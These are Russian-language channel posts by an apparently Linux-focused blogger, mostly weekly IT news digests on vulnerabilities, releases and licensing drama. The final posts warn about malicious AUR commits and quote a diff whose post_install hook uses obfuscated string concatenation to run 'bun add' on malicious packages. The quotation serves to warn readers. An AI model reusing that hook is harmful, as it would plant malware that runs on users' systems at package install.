Из плюсов - не надо разбивать длиннопосты на несколько, как в телеге, которая даже ссылки учитывает в длине сообщения, а также присутствует (в вебе) парсинг Markdown практически адекватный.

Из минусов - парсинг Markdown именно что практически адекватный: порезал списки, каждую точку/запятую после ссылки переносит на новую строку, либо съедает перенос строки в принципе 🤷‍♂️. Нельзя удалить превью первой ссылки.

Доброго времени суток! Представляю вашему вниманию дайджест около-айтишных новостей за прошедшую неделю (16 - 23 марта).

- Уязвимости в snapd и Rust Сoreutils, позволяющие получить root-привилегии в Ubuntu. В snap все дело в некорректном взаимодействии утилит snap-confine и systemd-tmpfiles, а во втором не был реализован безопасный обход путей и можно было подменить при вызове, например, rm, удаляемую директорию на ссылку и удалить что-то не то.
- Выпуск среды рабочего стола GNOME 50 с удалением поддержки X11. Как и обещали, собстна. Но сообщество уже подсуетилось и поехало пилить GNOME-X11, форк с возвращенной поддержкой иксов.
- Google анонсировал новый процесс установки сторонних приложений в Android. Выглядит, конечно, не очень юзер-френдли, но вполне себе неплохой UX для домохозяек.

- Релизы дистров и ОСей: OpenWrt 24.10.6 и 25.12.1, предварительный выпуск SteamOS 3.8.0, antiX 26.

Также у меня появился канал в MAX, присоединяйтесь!

А говорят, что у нас распилы прям распилы. Смотрите, там тоже (:

Также у меня появился канал в MAX, присоединяйтесь!

Кхе! Запасаемся поп-корном!

Также у меня появился канал в MAX, присоединяйтесь!

Мне кажется, или WAF у DNS сломался?

(я без VPN, если что)

Также у меня появился канал в MAX, присоединяйтесь!

Доброго времени суток! Представляю вашему вниманию дайджест около-айтишных новостей за прошедшие две недели (24 марта - 6 апреля).

- В Telega, альтернативном клиенте Telegram, выявили возможность совершения MITM-атаки. В общем, не используйте сторонние клиенты, дамы и господа, иначе ваши данные утекут, прям как в случае с Nekogram.
- Атаки на цепочку поставок прошедших двух недель: litellm, axios (разбор), pypi-пакет telnyx. Проверяйтесь и обновляйтесь по необхоимости!
- Грег Кроа-Хартман заметил улучшение в отчетах об ошибках от ИИ. Те, кто еще сомневаются, должны попробовать ИИшечку на своей кодовой базе (конечно же, с учетом возможных рисков утечки вашего кода для обучения оной). Верим и надеемся, что скоро ИИшечки будут компактны и производительны и им не нужно будет суперкластера для работы.
- Основатель и лидер Ubuntu MATE объявил об уходе из проекта. Интересы поменялись, MATE пару лет как в тотальной стагнации, беток свежего релиза Ubuntu до сих пор нет. Помянем?
- Более подробный разбор драмы ONLYOFFICE vs Euro-Office, о котором я писал ранее.
- Утечка кода инструментария Claude Code из-за забытого в NPM-пакете map-файла. Nuff said, happens even with the best of us. Не забудьте проверить, что у вас настроены хотя бы детекторы утечки кредов в гитцы 😊.
- Продолжение драмы Collabora vs TDF. На этот раз вторые исключили из своих рядов первых (включая сооснователей LibreOffice) в соответствии с новым принятым уставом, который не допускает присутствие в рядах сотрудников компаний, с которыми ведутся юридические разбирательства. Заряжаем еще одно ведро попкорна!
- Атаки GDDRHammer и GeForge, искажающие память GPU для доступа ко всей памяти CPU. Вкраце: ломая память GPU получаем доступ к памяти CPU (которая обычная RAM). Вроде бы есть методы защиты (включить ECC), но включение оных спровоцирует дополнительные накладные расходы при работе, а также потенциальное открытие двух других уязвимостей - ECCploit и ECC.fail. Получается максимально веселая ситуация - как бы вы ни старались, вас все равно поимеют 🫠.
- В ядре Linux 7.0 выявили регрессию, в два раза снижающую производительность PostgreSQL. PREEMPT_LAZY стал по-умолчанию для планировщика вместо PREEMPT_NONE, pgbench “simple-update” упал почти в два раза - с 98565 до 50751. Предлагается вернуть PREEMPT_NONE по-умолчанию, однако некоторые заявляют, что надо чинить юзерспейс (то есть постгрю), задействовать недавно добавленное в ядро расширение “rseq slice” (Restartable Sequences) для ограничения вероятности вытеснения держателя блокировки. Пахнет некоторой драмой, возможно стоит подготовить поп-корн, а пока ждем, что скажет Торвальдс.
- Возобновлены попытки удаления поддержки процессоров i486 из ядра Linux. Старичку давно пора на покой, отпустите его уже! А там, где такие CPU используются, можно и старый Linux попользовать.

- Релизы дистров и ОСей: VitruvianOS (гибрид окружения Haiku и ядра Linux), Ubuntu 26.04 Beta, Android 17 Beta 3, SystemRescue 13, ALT Mobile 11.0, 4MLinux 51.0, Apertis 2026 (позволяющий не использовать GPLv3 код), ROSA Fresh 13.2, /e/OS 3.6.

А вот конкретно сейчас зазывать вас в Max не буду, потому что эти долдоны сломали и markdown, и редактирование отложенного сообщения, чтобы в канал запостить уже хорошо отформатированное. Лучи поноса этим товарищам!

Доброго времени суток! Представляю вашему вниманию дайджест около-айтишных новостей за прошедшую неделю (7 - 13 апреля).

- В ядро Linux предложено включить распределённое реплицируемое блочное устройство DRBD 9. Отделение от TCP звучит вкусно, как и всякие улучшения производительности. Прямо уже хочется где-нибудь попробовать. А вообще помню, что с DRBD 8 было приличное количество спецэффектов, пользующие в проде, расскажите, как оно?
- Доля пользователей Linux в Steam превысила 5%. Вендекапец близко!
- Проект Solod развивает подмножество языка Go, транслируемое в язык Си. Без каналов и горутин выглядит как (пока что) какое-то ненужно, ибо это одни из основных фич языка Go. Посмотрим, что будет с этим проектом в будущем.
- Microsoft заблокировал учётные записи для заверения релизов VeraCrypt и WireGuard. Пока Макрософаг на связь с разработчиками не выйдет - новых релизов не будет, блокировка была произведена без предварительного уведомления. Особенно это забавно в виду того, что wireguard использует сам Microsoft в своем продукте Azure Kubernetes Service.
- Релиз Chrome 147 с поддержкой вертикальных вкладок и переделанным режимом чтения. Последнее нафиг не интересно, а вот первое - очень даже. Я хромого не пользую, но выглядит не совсем отвратно. Кто на нем - как вам вертикальные вкладки? А если сможете сравнить с Tree Style Tabs из Firefox - то будет вообще бесценно!
- Опубликована Linux-версия межсетевого экрана приложений Little Snitch. Примечательно, что для Linux оно все бесплатно либо опенсорсно, а вот пользователи яблока должны страдать (примерно по 60 тугриков за лицензию). Вот что GPL животворящий делает! 🫠

Очередные уязвимости и атаки:

- Атака GPUBreach, позволяющая получить root-доступ через выполнение CUDA-кода на GPU NVIDIA. Атака опасная, и скорее всего будет использоваться в комбинации с другой, чтобы получть какой-либо доступ к системе, а потом рутануть. Причем работает даже через IOMMU, так что как только будет апдейт с фиксом - обновляйтесь!
- Уязвимость во Flatpak, позволяющая выполнить код вне изолированного окружения. Уязвимость в dbus сервисе flatpak-portal, который является неким "проксиком" к реальным порталам (это всякие окна выбора файлов/диалогов, шаринга экрана, микрофон-камера и все такое прочее, предоставляемое системой для приложений). Пока что для быстрофикса этот "проксик" можно отключить через systemd. Ну а также там есть еще несколько уязвимостей, хоть и не совсем критичный (у этой - 9.3 из 10 скора), но тоже неприятные, поэтому обновляйтесь как будет обновление доступно!
- Опасные уязвимости в GStreamer, CUPS, wolfSSL, OpenSSL, OpenClaw, Nix и ядре Linux. Очень много уязвимостей в различных приложениях и библиотеках, обновляйтесь по возможности!
- Релизы дистров и ОСей: Deepin 25.1, Trisquel 12.0 (для тотальных фанатов швабодки).

Также у меня появился канал в MAX, присоединяйтесь! Они чуток пофиксили парсинг markdown!

Доброго времени суток! Представляю вашему вниманию дайджест около-айтишных новостей за прошедшие 2 недели (14 - 27 апреля).

- Релиз ядра Linux 7.0. Из интересного - правила ИИ-патчей (разраб должен верифицировать, а не просто отослать), NFS 4.1 по-умолчанию, rust теперь как один из основных ЯП, BPF в io_uring, начальная реализация wifi 8, оптимизации UDP (до 12% на 100 гбит).
- Чистка в ядре Linux: удалены опции сборки для процессоров i486, удаление поддержка процессоров Baikal, удаление старых Ethernet-драйверов.
- В OpenBSD переименовали поле в pfsync после ложного AI-отчёта об уязвимости. Или почему за ИИшечкой всегда надо все проверять и почему появились, например, такие товарищи.
- SDL запретил приём кода от AI. Созданы форки Vim, избавленные от AI-изменений. Если Linux, например, написал правила, то ярые противники ИИшечки, во-первых, запрещают писать код с помощью ИИ, а во-вторых пилят ИИ-free форки (то есть удаляют код, сгенерированный ИИ, в форке). Но по правде говоря, заголовок байтовый, ибо SDL пошел по пути Linux (код, сгенерированный ИИ, должен быть проверен человеком).
- Отчеты о развитии KDE. Из интересного - менеджмент сессий в Wayland, переключение рабочих столов на каждом экране отдельно, разделение по названием GPU в system monitor, для видеокарт intel (i915 и xe) включена поддержка аппаратных overlay-плоскостей.
- Уязвимости в Java SE, MySQL, VirtualBox и других продуктах Oracle. Очередная пачка уязвимостей, не забудьте обновиться.
- Проект WSL9x для запуска современных Linux-ядер в окружении Windows 95. Чем бы дитя не тешилось, лишь бы по подъездам не шарилось ©. Реальная юзабельность в дикой природе под вопросом, конечно же, но идея забавная (и ведь работает!).
- В Rust Coreutils выявлено 113 уязвимостей. В Ubuntu 26.04 возвращены cp, mv и rm из GNU Coreutils. В очередной раз убеждаемся, что "серебряной пули" не существует, и что код говно не потому, что написан на Си, а потому что разрабы - криворукие дураки.

- Релизы дистров и ОСей: Raspberry Pi OS 2026-04-13, Альт Рабочая станция К 11.3, Zorin OS 18.1, Solus 4.9, GhostBSD 26.1, Ubuntu 26.04, CachyOS 260426.

Также у меня появился канал в MAX, присоединяйтесь!

Тем временем вышел Zed 1.0. Так как я его периодически потыкиваю, ибо он чуть-чуть недотягивал до удобства VSCode'а, решил потыкать и в этот раз.

Из замеченного:

- Появилась возможность вывести закрепленные вкладки в отдельную строку, выше обычных вкладок. Ура!
- Информативное дерево изменений в git.
- Возможность красиво посмотреть коммиты и ветки в git.
- Возможность иметь несколько рабочих деревьев для проекта в git.
- Возможность работать с ветками (создание, переключение, удаление) в git.
- Относительно адекватно работающий sticky scroll (это когда вы скроллите, а текущая область кода, так же известные как скоуп/функции/классы, отображаются сверху).

Собственно, 1.0 не зря есть 1.0. В принципе, можно пользовать. Но конечно же, ложка дегтя присутствует - у меня на Macbook Pro M4 при скроллинге жрется 50-60% GPU, что может сделать очень печальной работу с локальными ИИшками, которые я пользую для автодополнения. Настроек как это починить или снизить влияние я не нашел, ну и стоит учитывать, что это не Electron и тут прямой рендер через GPU, так что ждем фиксов с оптимизациями, наверняка последуют.

Также у меня появился канал в MAX, присоединяйтесь!

Думаем, куда с товарищем @leaveitru переезжать техническим доменом, который был в зоне wtf.

Пока выбирали домен рег.ру сделал такое предложение. Нраица! :D

Также у меня появился канал в MAX, присоединяйтесь!

Кстати, забавностей с Zed прибыло.

Курсор на строчке с первым параметром, но подсвечивает уже второй параметр в сигнатуре функции.

И это и правильно, и неправильно одновременно. Правильно с позиции разбора кода (запятая есть разделитель параметров), а неправильно с UX позиции (гошка позволяет форматировать код таким образом, и удобнее было бы видеть подсвеченным первый параметр).

Также у меня появился канал в MAX, присоединяйтесь!

Доброго времени суток! Представляю вашему вниманию дайджест около-айтишных новостей за прошедшую неделю (28 апреля - 5 мая).

- В Ubuntu намечена интеграция AI. С одной стороны неплохое начинание, с другой все мы помним про интеграцию рекламы и следилок в Unity, поэтому к этой штуке надо относиться с осторожностью. Но за что можно сказать "спасибо" - все ИИшности будут исполняться только локально.
- Представлен GTK2-NG, форк библиотеки GTK2. У меня с этим тулкитом связаны самые приятные воспоминания, начиная от тем rezlooks и заканчивая софтом на Go и GTK2, который я писал. Простой, но в то же время фичастый, хоть и не всегда удобный (привет, rich text). Посмотрим, во что это выльется.
- Notepad++ теперь доступен на macOS как нативное приложение. Возрадуйтесь все те, кому TextEdit.app (встроенный текстовый редактор в macOS) было мало, теперь вы можете при переезде с винды пользовать что-то привычное! Однако не все так радужно, на самом деле, так как, во-первых, плагины надо портировать, а во-вторых, автор Notepad++ потребовал переименовать порт для macOS из-за нарушения товарного знака, так что в скором времени все вернется на круги своя и вы будете скачивать сторонний редактор, который, возможно, похож на Notepad++, и даже имеет схожий функционал, но называется по-другому. А вообще к автору порта есть вопросы, так как Дон Хо (автор Notepad++) утверждает, что код был написан ИИшечкой и в принципе какого-то отношения к Notepad++ не имеет.
- Очередной отчет о развитии KDE. Из интересного - поддержка портала "background apps" (приложение может убрать окна и оставить свой значок в трее), улучшения в контроле доступа к устройствам ввода, улучшено автоматическое управление яркостью экрана.

Подборочка взломов и уязвимостей:

- В Python-пакет elementary-data, имеющий 1.1 млн загрузок в месяц, внедрён вредоносный код. Нет, это не про ElementaryOS, а другая элементарная штука, связанная с ИИшечкой и базами данных. Так что одни выдыхают, а другие в очередной раз в мыле из-за уязвимости в шаге Github Actions.
- Copy Fail - уязвимость в ядре Linux, позволяющая получить root в большинстве дистрибутивов. Вкраце - вас могут поиметь в любом дистрибутиве и получить root-доступ, но требуется локальный доступ к компу. Проблема проявляется начиная с ядра Linux 4.14 (2017 год) ¯\_(ツ)_⧸¯. Так что как увидите обновление - сразу обновляйтесь, мало ли.

- Релизы дистров и ОСей: Fedora Linux 44, Bazzite 44, Proxmox Backup Server 4.2.

Также у меня появился канал в MAX, присоединяйтесь!

Доброго времени суток! Представляю вашему вниманию дайджест около-айтишных новостей за прошедшие 3 недели (6 - 25 мая). Эти 3 недели, возможно, из-за весеннего обострения, оказались богаты на всякие уязвимости и утечки.

Скоро ЧМ по футболу, поэтому сроки поставки свежих дайджестов где-то до конца июня могут быть увеличены. Работа, понимаете ли.

1/2

- Уязвимости в Nix и Lix, позволяющие поднять привилегии в системе. Пофиксили рекурсивную распаковку, докинули проверочек и валидаций. Классика.
- Уязвимость в CPU AMD Zen 2, позволяющая повысить привилегии и обойти изоляцию виртуальных машин. Если вы обновляли микрокод на десктопе и ноуте (drk.xfz Threadripper) - вы в безопасности, а вот пользователи EPYC должны дождаться пропатченного ядра/Xen и фикситься софтово.
- Подборочка уязвимостей в ядре Linux: Dirty Frag, Fragnesia, DirtyDecrypt, уязвимость в pidfd, PinTheft, GRO Frag. Предложен killswitch для экстренного отключения уязвимой функциональности в ядре Linux.
- Уязвимость в системном вызове execve, предоставляющая root-доступ во FreeBSD. Ошибка математики привела к тому, что копировалось больше данных, чем нужно, что позволяло выполнить в итоге свой код. Также во фряхе устранили еще несколько уязвимостей, все они либо про переполнение буфера/стека, либо про кривую математику, либо классический use after free.
- Уязвимости в dnsmasq, допускающие отравление DNS-кэша и выполнение кода с правами root. Классика - переполнение буфера, чтение за пределами буфера из-за недостаточной валидации. Обновляйтесь, если пользуете.
- Уязвимость в Exim, приводящая к удалённому выполнению кода на сервере. Проблема проявляется у фанатов швабодки, собирающих Exim с GNUTLS, и является обычным use after free, который можно эксплуатировать для выполнения кода на сервере с правами процесса.
- Обновление nginx 1.31.0 с устранением RCE-уязвимости, эксплуатируемой через HTTP-запрос. Все из-за rewrite модуля, который выделял память на URL с неэкранированными спецсимволами, а помещал туда уже экранированные (и, соответственно, строка становилась длиннее). Присутствует уязвимость, внимание, с версии 0.6.27 от марта 2008 года, так что поздравляем ее с совершеннолетием :). Также в этой версии есть несколько классических уязвимостей вида use after free, чтение за пределами выделенного буфера и т.д. Ну и сразу же опять фикс переполнения буфера в rewrite модуле.
- QEMUtiny - уязвимости в QEMU, позволяющие получить доступ к хост-окружению из гостевой системы. Ничего нового - чтение за пределами выделенного буфера. Но сейчас есть эксплоит только для последней версии (11.0.0), однако исследователи, обнаружившие уязвимость, утверждают, что можно с помощью сканирования памяти процесса сделать его универсальным (но им, видимо, лень). В общем, откатывайтесь или обновляйтесь :).
- Компрометация GitHub-токена Grafana Labs привела к утечке закрытого кода. Код увели, разрабов шантажировани, платить разрабы отказались. Ждем появление кода на всяких хацкерских форумах в даркнете?
- Во FreeBSD устранено 4 уязвимости, позволяющие поднять привилегии, и одна удалённая root-уязвимость. Опять же, классика - отсутствие экранирования спецсимволов (и ведь пришло кому-то в голову точку доступа к вифи называть как "test `id`"!), use-after-free, отсутствие валидации и переполнения буферов. Обновляйтесь, в общем, все фиксы уже доступны к накатыванию.

Также у меня появился канал в MAX, присоединяйтесь!

2/2

Но хватит про очень плохое:

- Проект PHP перешёл на лицензию BSD-3 и изъял из обращения лицензию PHP License. Теперь можно спокойно использовать “PHP” где угодно, возрадуйтесь! Ну или нет ¯⧹_(ツ)_⧸¯.
- Доменная зона DE на несколько часов была выведена из строя из-за DNSSEC. Похожее было и с .ru в январе 2024 года. Еще одно напоминание о том, что криптография - это, конечно, хорошо, но требует очень аккуратного обращения.
- В Debian утверждена обязательная поддержка воспроизводимых сборок пакетов. Теперь если пользователь не может собрать бинарно идентичный пакет - он не будет принят в состав репозитория. Безусловно, это очень хорошо, особенно когда у нас через день что-то компрометируют и вставляют закладки.
- Новый reCAPTCHA не позволит пройти проверку на Android-устройствах без сервисов Google. Так как теперь все будет проходить через Play Integrity API, то всякие LineageOS без гуглосервисов не прокатят, а статус сертифицированного легко потерять при установке кастомной прошивки. Посмотрим, чем это все кончится.
- В Python 3.14.5 из-за утечек памяти возвращён старый сборщик мусора. И в 3.15 он не вернется. Ждем антидота от "укуса хромом", то есть от пожирания памяти.
- Adobe Lightroom CC при помощи AI адаптирован для работы в Linux через Wine. Адаптирован, конечно же, не адобой, а энтузиастами, которые циклично заставляли ИИшечку запускать оный в Wine, анализировать ошибки и дампы, писать заглушки или реализации необходимых функций, инжектить DLLки. С одной стороны - хорошее начинание, с другой - работать точно будет очень так себе в итоге. Когда же Adobe сделает нативные версии?
- Создан виртуальный музей операционных систем. Похоже, я знаю, на что я залипну в ближайшие выходные 😏 .
- Опубликован офисный пакет ONLYOFFICE 9.4 с обновлением лицензии на код. Теперь там плюс-минус все стандартно, фонд СПО может быть доволен, а европейские политики могут клепануть свой Euro-Office. Драма закончилась.
- Нарушение AGPL производителем 3D-принтеров Bambu Lab и создание форка Bambu Studio. Антитивоизация as it is - создали форк софта от Bambu для взаимодействия с их принтерами, только теперь под защитой фонда СПО, ибо нефиг. Есть подозрение, что Bambu Lab также прилетит хороший такой иск за нарушение AGPLv3, готовим попкорн.

Релизы дистров и ОСей: OmniOS CE r151058 (на технологиях OpenSolaris), ToaruOS 2.3 (самобытная Unix-подобная ОС), OpenWrt 25.12.3, Ubuntu Touch 24.04-1.3, AGL UCB 21.0 (база для автомобилей), Debian 12.14 и 13.5, OpenBSD 7.9, Proxmox VE 9.2, Ubuntu Core 26, RHEL 10.2 и RHEL 9.8, TileOS 2.0 (debian с тайловыми WM), MX Linux 25.2.

Также у меня появился канал в MAX, присоединяйтесь!

Доброго времени суток!

Дайджест откладывается до следующей недели, работка - она такая, перегружает иногда.

Пока предлагаю поофигевать с того, что у majordomo какая-то проблема, виртуалочки немного прилегли (как минимум у меня). Сетевые проблемы, говорят в саппорте.

Доброго времени суток! Представляю вашему вниманию дайджест около-айтишных новостей за прошедшие 2 недели (26 мая - 7 июня).

Прошедшее время выдалось очень богатым на уязвимости, поэтому обновляйтесь как можно скорее. Лучше уж "не было печали - апдейтов накачали" и починиться за пару часов, чем ваши данные поимеют тем или иным способом.

- Расширение системной памяти через подкачку в видеопамяти NVIDIA. Если у вас есть дискретка от nVidia на ноутбуке и вы ей особо не пользуетесь, то вы можете через подкачку “расширить” размер доступной оперативки. Выглядит очень неплохо, если вам нужно много оперативки а она, скажем, распаяна.
- Немного приколов про использование ИИ: в jqwik добавлена скрытая деструктивная инструкция для AI-агентов, каталог GNOME Circle не будет принимать приложения, созданные с использованием AI, разработаны правила использования AI в проекте Rust, проблемы с соблюдением авторского права при переписывании ScanCode на Rust при помощи AI, Регрессии в rsync 3.4.3 и принятие изменений, подготовленных с использованием AI.

Подборка уязвимостей:

- Google случайно раскрыл детали неисправленной уязвимости в Chromium. Видимо, внутри гугля не смогли договориться, что это фича, а не баг, но на самом деле это оказалось багом. Ситуация забавная, пользователем хромого соболезную, ибо злоумышленники быстро возьмут это на вооружение.
- Уязвимости в Samba, допускающие удалённое выполнение кода в редких конфигурациях. Конфигурации-то редкие (использование скрипта для аутентификации и сервера печати), но баги стандартные - отсутствие экранирования спецсимволов. Не забудьте обновиться ASAP, если такое пользуете. Также там еще несколько уязвимостей устранили, включая DoS с помощью спецпакета UDP, так что не отмазывайтесь, а обновляйтесь.
- Уязвимости в Unbound, Kata-Containers, BIND, PostgreSQL, HPLIP, MongoDB, Rsync, 7-zip, Yelp, qSnapper и Suricata. Гонки, повышение привелегий, отсутствие валидации входящих данных, переполнение буфера, и, наверняка, use after free (в новости не написано). Классика жанра, обновляемся, если пользуете что-то из перечисленного.
- CIFSwitch - уязвимость в CIFS-подсистеме ядра Linux, позволяющая получить права root. Отсутствие валидации входящих данных. Пока что доступен только патч в ядро, нового релиза оного с фиксом пока нет.
- Макрософаг опять сделал РЕШЕТО - Fedora Linux помог выявить проблему с безопасностью в почтовом клиенте Outlook. Вкраце - аутглюк даже при установленной галке использования STARTTLS для POP3/IMAP его (STARTTLS) не использовал и соединение было нешифрованным. Известно о таком поведении как минимум начиная с Outlook 2007.
- Уязвимость в libinput, позволяющая повысить свои привилегии в системе. Угадайте, в чем дело? 1... 2... 3... И? Угадали! Отсутствует экранирование спецсимволов! Прототип эксплоита уже доступен, поэтому обновляйтесь как только соберут для вашего дистрибутива.
- Атака на реализации HTTP/2, приводящая к исчерпанию доступной памяти. Проблеме подвержены nginx, apache, IIS (который от макрософага), Envoy, Cloudflare Pingora. Там все просто - внутри сжатых заголовков ссылка на значение, которое пустое, но при обработке которого выделяется определенное количество байт в любом случае. Для apache есть фикс, но еще не зарелижен, IIS и Pingora пока не пофикшены, остальное уже зачинено.
- В Chrome устранено 429 уязвимостей, а в Android - 124. Там короче вообще жесть, а 3 проблемы даже сдали Qualcomm, так как косяки - они.

- Релизы дистров и ОСей: AlmaLinux 9.8 и 10.2, Rocky Linux 9.8 и 10.2, NixOS 26.05, Armbian 26.5, Ubuntu Sway Remix 26.04 LTS.

Также у меня появился канал в MAX, присоединяйтесь!

Ради прикола попробовал в яндексовую Алису (с плюсом) запустить задачу: "напиши код на Go для обработки вебхуков от Vikunja и пересылки их в $MESSENGERNAME", где оные это тележенька, Макс, ntfy, mattermost, matrix, XMPP, nextcloud talk.

Результаты:

- Telegram: юзабельно
- Макс: нераспарсила что это и сгенерила какой-то рандомный отправщик в рандомный send-message какого-то com-домена.
- ntfy: юзабельно
- mattermost: юзабельно
- matrix: юзабельно
- XMPP: юзабельно
- nextcloud talk: юзабельно

Из спецэффектов: неправильная структура вебхука Vikunja, остальное выглядит вменяемо, для xmpp и matrix вполне нормально сформировала код отправки сообщений, используя правильные зависимости и структуру сообщения.

Скоро опусы с клавой станут не нужны? :)

В списке рассылки AUR (Arch User Repository) идет активное обсуждение вредоносных коммитов, которые устанавливают в зависимости сборки - bun (js рантайм типа nodejs) и в postinstall скрипт вставляют установку вредоносов (типа пакетов js-digest, lockfile-js). Пока что известно (из списка рассылки) о почте 1 тысяче затронутых пакетов (а скорее всего их намного больше), поэтому если будете обновляться - посмотрите в PKGBUILD, чтобы не подтянуть вредоноса себе в систему.

https://lists.archlinux.org/archives/list/aur-general@lists.archlinux.org/thread/FGXPCB3ZVCJIV7FX323SBAX2JHYB7ZS4/

Продолжаем нести вести с полей - теперь там небольшая обфускация через конкатенацию строк все того же bun:

+++ b/htbrowser-bin-deps.install
@@ -0,0 +1,3 @@
+post_install() {
+ $'\x63'"d" "/"'t'"m"'p' && "b"'u''n' 'a'"d"'d'
$'\141\x6e''s'"i""-"$'\143''o''l''o''r'$'\x73'
'n'"e"'x'"t""f"'i''l''e''-''j''s'
+}

Регистрацию в AUR отключили для чистки (и возможно выработки методов защиты).